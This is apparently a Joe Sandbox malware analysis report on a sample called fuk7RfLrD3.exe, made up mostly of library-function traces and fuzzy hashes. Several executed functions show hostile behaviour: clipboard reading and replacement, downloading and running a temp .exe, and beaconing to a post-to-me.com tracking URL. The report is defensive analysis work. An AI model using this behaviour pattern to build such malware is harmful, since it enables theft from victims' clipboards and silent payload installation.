Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 49f18775c2913115c51a539a1c8522bc708e26fba43e34353c77f18314d1360c
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: ED11807240004ABBDF125E86DC45CEE3F22BF18354B698456FE1859130C73ACAB2AB85

Function 006932BA Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 006932DA
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 006932F8

Part of subcall function 00688DB0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00688DD1
Part of subcall function 00688DB0: Hash.LIBCMT ref: 00688E11

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00693301
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00693321

Part of subcall function 0068FE08: Hash.LIBCMT ref: 0068FE1A

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 4b83d86a1f67eedc554c024963c912dc2682ced843b86a0bb7361201da326f7a
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 65016D76400604ABCB14EFA5C8819CAF7EDFF18310F008A1EE55697651DB70F944CBA0

Function 006762B5 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006762BC

Part of subcall function 0067C4DD: __EH_prolog3_GS.LIBCMT ref: 0067C4E4

std::_Locinfo::_Locinfo.LIBCPMT ref: 00676307
__Getcoll.LIBCPMT ref: 00676316
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00676326

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction ID: 313540d65806cf12c871ec00175079f41c281042fa2c9eb801f824cd2c2c4e38
Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction Fuzzy Hash: BD016971910208DFEB90EFA4C541BDCBBB2BF48320F10C42DE1496B242CB789548CB58

Function 006757F9 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00675800

Part of subcall function 0067C4DD: __EH_prolog3_GS.LIBCMT ref: 0067C4E4

std::_Locinfo::_Locinfo.LIBCPMT ref: 0067584B
__Getcoll.LIBCPMT ref: 0067585A
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0067586A

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction ID: ce5b5c5cc6d877b7b939e9e333dc990239fd3a61129564f73c367cd5c1e70a9d
Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction Fuzzy Hash: 640169719102089FEB90EFA4C441BDCBBB1BF48320F10C56DE549AB242CBB49544CF59

Function 0068C867 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0068C899
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0068C8A9
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0068C8B9
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0068C8CD

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 42062f8f67e001bead95228be33fa76eb42a748122ec6e873e1048aa28e2d2fe
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 650119B6484149ABCF62BE54EC028AD7F67AB04370B14C616FA1985271C332CA71EB69

Function 0067DBB5 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00681A6B

Part of subcall function 006812DD: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 006812FF
Part of subcall function 006812DD: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00681320

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00681A7E
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00681A8A
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00681A93

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction ID: 8cc6173285fe201a479c4d97cab8e2e807c3b15227a99a2713ad1f35d7489cb6
Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction Fuzzy Hash: 5EF0B43064160867AF98BAB884525FD219F4F86360B14472DB5626F3C2DE709E079358

Function 0044DEB0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0044DDB0: GetStartupInfoA.KERNEL32(00000000), ref: 0044DDC3
Part of subcall function 0044DDB0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044DDDD

GetEnvironmentStringsW.KERNEL32(771ADFA0,00000000), ref: 0044DEE5
FindFirstVolumeW.KERNEL32(00000000,00000000), ref: 0044DEEF
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 0044DEFE
GetVolumePathNameA.KERNEL32(00000000,00000000,00000000), ref: 0044DF1D

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: NamePathVolume$CreateEnvironmentFindFirstInfoProcessShortStartupStrings
String ID:
API String ID: 2585965437-0
Opcode ID: 39567ebb9986afbe195a996a128752368ee49b5066af6499d6118aa0f6fc262a
Instruction ID: 8efb327dc3f24e315fd08e9975727eae932b8f1c6e4b42b7655a4a6f1774c148
Opcode Fuzzy Hash: 39567ebb9986afbe195a996a128752368ee49b5066af6499d6118aa0f6fc262a
Instruction Fuzzy Hash: 7BF0AFB1A083009BE660EF60ED46B1577B4AB88B1AF50403AF3059A1E2DAB49444CB1E

Function 0068D79D Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0068D7B1
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0068D7D5
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0068D7E8
__CxxThrowException@8.LIBVCRUNTIME ref: 0068D7F6

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: 5ac0eeaa769f6fe2e15b7b9819f8fae8adfb2e22ab241cf9b755418669776667
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: A6F0E93550060467C724FA14D852C9EB37B9E90B11370835EE405572C2DB71A90AC7A9

Function 0068D655 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0068D65F
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0068D690
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0068D6AC
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0068D6B5

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreDecrementResourceSubscription$CountCurrentDestroyExecutionFixedLevelManager::
String ID:
API String ID: 3725331629-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: f80083f94923d705eac7ebc10dc9d39c2d1ac6cc24d232854247b018d5c06764
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 2DF0A036200910EB8A65FF21E9118BB73B7AFC4710310071DE55B47AA1DF26E986DB75

Function 00676196 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 006761B2
__Cnd_signal.LIBCPMT ref: 006761BE
std::_Cnd_initX.LIBCPMT ref: 006761D3
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 006761DA

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: 4d66fb43dcccc5fc7e6d19c8d46e292d01a9a5fe64e5b7ebf9e2be427ab1ecd2
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: FDF0A031400700AFF7A17B64C807B0A77E6AF01321F548D1DF05E69592DFBAA8144B5D

Function 00699060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00699093
__IsNonwritableInCurrentImage.LIBCMT ref: 0069914C

Strings

csm, xrefs: 00699136

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: e28fd187e1b67a05cda4f908c96669cad9f99e427d6ff8d8298427bb060b97ac
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 1A410634A00209ABCF10DF6CC885ADEBBFABF45324F14815DE8159B792D731DA12CBA5

Function 00682BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00682C6D
__CxxThrowException@8.LIBVCRUNTIME ref: 00682C7B

Strings

ED, xrefs: 00682BD9

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: ED
API String ID: 2172578484-412002901
Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction ID: ecfef3483523aa9ff7630be087c6ba395b61218e2c6f5bf8701b381cb9029615
Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction Fuzzy Hash: 2F1182759003157FE7507B75AC8AA7B3BADAE05F53320072EF901D3252EA79D900876C

Function 0044DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0044DE5F
GetComputerNameW.KERNEL32(?,?), ref: 0044DE6F

Strings

<, xrefs: 0044DE4A

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ComputerMaskNameNodeNumaProcessor
String ID: <
API String ID: 4267802154-4251816714
Opcode ID: 924b3f61864d54fc396479e5295096f4626ad5acb0dd19c43fe891adc7a6b8f3
Instruction ID: c992a363758df7faae2bd5a0f2cf00c73478dcf4a0ad24a2a4de54c3ce959daa
Opcode Fuzzy Hash: 924b3f61864d54fc396479e5295096f4626ad5acb0dd19c43fe891adc7a6b8f3
Instruction Fuzzy Hash: A001C4708087419BD314DF24E98575BBBE0EF94718F51CA2DF4D94F291D63884489B8B

Analysis Process: fuk7RfLrD3.exePID: 7812, Parent PID: 7732COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.1%
Total number of Nodes:	731
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

Function 004029EA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
CloseHandle.KERNEL32(00000000), ref: 00402AFD
ShellExecuteExW.SHELL32(?), ref: 00402B5E
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
CloseHandle.KERNEL32(?), ref: 00402B7F
InternetCloseHandle.WININET(00000000), ref: 00402B88
InternetCloseHandle.WININET(00000000), ref: 00402B8B

Strings

.exe, xrefs: 00402A61
ShareScreen, xrefs: 00402A08
<, xrefs: 00402B3B

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4

Function 0043D02C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

GetLastError.KERNEL32 ref: 0043D140
__dosmaperr.LIBCMT ref: 0043D147
GetFileType.KERNEL32(00000000), ref: 0043D153
GetLastError.KERNEL32 ref: 0043D15D
__dosmaperr.LIBCMT ref: 0043D166
CloseHandle.KERNEL32(00000000), ref: 0043D186
CloseHandle.KERNEL32(?), ref: 0043D2D0
GetLastError.KERNEL32 ref: 0043D302
__dosmaperr.LIBCMT ref: 0043D309

Strings

H, xrefs: 0043D28E

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

Function 00432F19 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

Function 00402BFA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
InternetCloseHandle.WININET(00000000), ref: 00402E41
InternetCloseHandle.WININET(00000000), ref: 00402E44

Strings

&cc=DE, xrefs: 00402DAA, 00402DB0, 00402E0D
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C4D, 00402D79, 00402DE8
ShareScreen, xrefs: 00402C18

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

Function 004051C6 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051DA
__Mtx_init.LIBCPMT ref: 00405200
std::_Cnd_initX.LIBCPMT ref: 00405223
__Thrd_start.LIBCPMT ref: 00405248
std::_Cnd_waitX.LIBCPMT ref: 00405268
std::_Cnd_initX.LIBCPMT ref: 00405295

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

Function 004057F6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 00405812
__Cnd_signal.LIBCPMT ref: 0040581E
std::_Cnd_initX.LIBCPMT ref: 00405833
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

Function 00402956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00402985
__fassign.LIBCMT ref: 00402995

Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Strings

+@, xrefs: 004029DA

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID: +@
API String ID: 2843524283-4068139069
Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

Function 0042DFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: <(@
API String ID: 1611280651-4189137628
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

